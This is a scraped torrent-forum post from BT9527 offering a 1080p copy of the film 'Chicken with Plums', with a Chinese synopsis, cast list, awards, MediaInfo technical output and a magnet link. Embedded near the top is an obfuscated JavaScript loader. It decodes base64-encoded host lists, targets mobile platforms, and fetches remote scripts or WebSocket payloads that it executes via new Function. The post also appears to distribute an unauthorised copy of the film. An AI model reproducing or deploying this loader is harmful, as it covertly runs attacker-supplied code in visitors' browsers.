梅子鸡之味[中文字幕].Chicken.with.Plums.2011.1080p.BluRay.x265.10bit 5.08GB

版主小s 26天前 190

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 梅子鸡之味 / 依恋,在生命最后八天(台) / 依恋在生命最后8天(港) / 梅子鸡 / Chicken with Plums / Huhn mit Pflaumen
◎片  名 Poulet aux prunes
◎年  代 2011
◎产  地 法国 / 德国
◎类  别 剧情 / 喜剧
◎语  言 法语
◎上映日期 2011-10-26(法国)
◎IMDb链接 https://www.imdb.com/title/tt1663321/
◎豆瓣评分 8.1/10 (28005人评价)
◎豆瓣链接 https://movie.douban.com/subject/5151357/
◎片  长 93分钟
◎导  演 玛嘉·莎塔琵 Marjane Satrapi (id:1041466)
       文森特·帕兰德 Vincent Paronnaud (id:1308654)
◎编  剧 文森特·帕兰德 Vincent Paronnaud (id:1308654)
       玛嘉·莎塔琵 Marjane Satrapi (id:1041466)
◎演  员 伊莎贝拉·罗西里尼 Isabella Rossellini (id:1019046)
       格什菲·法拉哈尼 Golshifteh Farahani (id:1009332)
       玛丽亚·德·梅黛洛 Maria de Medeiros (id:1025298)
       马修·阿马立克 Mathieu Amalric (id:1040679)
       齐雅拉·马斯楚安尼 Chiara Mastroianni (id:1018149)
       贾梅尔·杜布兹 Jamel Debbouze (id:1018139)
       埃德瓦·贝耶 Edouard Baer (id:1037147)
       埃里克·卡拉瓦卡 éric Caravaca (id:1041853)
       克里斯蒂安森格沃德 Christian Sengewald (id:1318988)
       马德琳·封丹 Madeline Fontaine (id:1283945)

◎标  签 法国 / 文艺 / 爱情 / 剧情 / 伊朗 / 音乐 / 人生 / 2011

◎简  介
  因为妻子摔破了自己心爱的小提琴,音乐家纳瑟·阿里(马修·阿马立克 Mathieu Amalric饰)决定自杀,绝食八天后他终于死去。在这八天里,躺在床上的他回顾了自己的一生。他想起了自己与弟弟的小时候,想起了自己的女儿和儿子,想起了自己失败的婚姻,想起了母亲临死前的场景。当然,他还想起了自己一生的挚爱——伊兰娜(格什菲·法拉哈尼 Golshifteh Farahani 饰)。                                    
                                年轻时的他,音乐造诣并不高,被老师评价为只有技巧缺乏感情。有一次,他在一家钟表店邂逅了美丽的伊兰娜。从此他的命运改变了方向,他与伊兰娜经历了一场难忘的恋爱。然而,命运弄人,他与伊兰娜最终还是分开了……                                    
                                《梅子鸡之味》改编自导演 玛嘉·莎塔琵的绘本作品。主人公原型是导演的伯父,是伊朗一位著名的音乐家。

◎获奖情况 (共2项)
  第68届威尼斯电影节 (2011)
  金狮奖(提名)

  第3届豆瓣电影鑫像奖 (2013)
  鑫豆单元 最容易忽视的好电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 289967239358774520518460695537820097469 (0xDA25A8AECCCD80ED7F79DEC078B7DBBD)

  4. Complete name                            : Chicken.with.Plums.2011.1080p.BluRay.x265.10bit-MNHD.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.08 GiB

  8. Duration                                 : 1 h 31 min

  9. Overall bit rate                         : 7 931 kb/s

  10. Movie name                               : Chicken with Plums 2011 1080p BluRay x265 10bit MNHD

  11. Encoded date                             : UTC 2021-08-30 05:04:31

  12. Writing application                      : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library                          : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 31 min

  21. Bit rate                                 : 7 263 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 800 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.197

  31. Stream size                              : 4.65 GiB (92%)

  32. Writing library                          : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  33. Encoding settings                        : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=131895 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=20.9 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default                                  : Yes

  35. Forced                                   : No

  36. Color range                              : Limited

  37. Color primaries                          : BT.709

  38. Transfer characteristics                 : BT.709

  39. Matrix coefficients                      : BT.709


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AC-3

  43. Format/Info                              : Audio Coding 3

  44. Commercial name                          : Dolby Digital

  45. Codec ID                                 : A_AC3

  46. Duration                                 : 1 h 31 min

  47. Bit rate mode                            : Constant

  48. Bit rate                                 : 640 kb/s

  49. Channel(s)                               : 6 channels

  50. Channel layout                           : L R C LFE Ls Rs

  51. Sampling rate                            : 48.0 kHz

  52. Frame rate                               : 31.250 FPS (1536 SPF)

  53. Compression mode                         : Lossy

  54. Stream size                              : 420 MiB (8%)

  55. Language                                 : French

  56. Service kind                             : Complete Main

  57. Default                                  : Yes

  58. Forced                                   : No


  59. Text #1

  60. ID                                       : 3

  61. Format                                   : PGS

  62. Muxing mode                              : zlib

  63. Codec ID                                 : S_HDMV/PGS

  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration                                 : 1 h 23 min

  66. Bit rate                                 : 27.1 kb/s

  67. Count of elements                        : 1637

  68. Stream size                              : 16.2 MiB (0%)

  69. Title                                    : CHS

  70. Language                                 : Chinese

  71. Default                                  : Yes

  72. Forced                                   : No


  73. Text #2

  74. ID                                       : 4

  75. Format                                   : PGS

  76. Muxing mode                              : zlib

  77. Codec ID                                 : S_HDMV/PGS

  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration                                 : 1 h 23 min

  80. Bit rate                                 : 28.3 kb/s

  81. Count of elements                        : 1637

  82. Stream size                              : 16.9 MiB (0%)

  83. Title                                    : CHT

  84. Language                                 : Chinese

  85. Default                                  : No

  86. Forced                                   : No


  87. Text #3

  88. ID                                       : 5

  89. Format                                   : UTF-8

  90. Codec ID                                 : S_TEXT/UTF8

  91. Codec ID/Info                            : UTF-8 Plain Text

  92. Duration                                 : 1 h 25 min

  93. Bit rate                                 : 38 b/s

  94. Count of elements                        : 808

  95. Stream size                              : 24.2 KiB (0%)

  96. Title                                    : ENG

  97. Language                                 : English

  98. Default                                  : No

  99. Forced                                   : No


  100. Menu

  101. 00:00:00.000                             : en:Chapter 01

  102. 00:04:42.157                             : en:Chapter 02

  103. 00:13:00.446                             : en:Chapter 03

  104. 00:16:45.796                             : en:Chapter 04

  105. 00:23:55.225                             : en:Chapter 05

  106. 00:30:35.292                             : en:Chapter 06

  107. 00:34:56.803                             : en:Chapter 07

  108. 00:38:16.377                             : en:Chapter 08

  109. 00:43:38.282                             : en:Chapter 09

  110. 00:46:25.574                             : en:Chapter 10

  111. 00:52:55.964                             : en:Chapter 11

  112. 01:01:51.458                             : en:Chapter 12

  113. 01:08:03.371                             : en:Chapter 13

  114. 01:13:03.629                             : en:Chapter 14

  115. 01:18:32.625                             : en:Chapter 15

  116. 01:26:11.333                             : en:Chapter 16



TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:9827792F75BB5B5091A53A8B321B598D99F38593
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回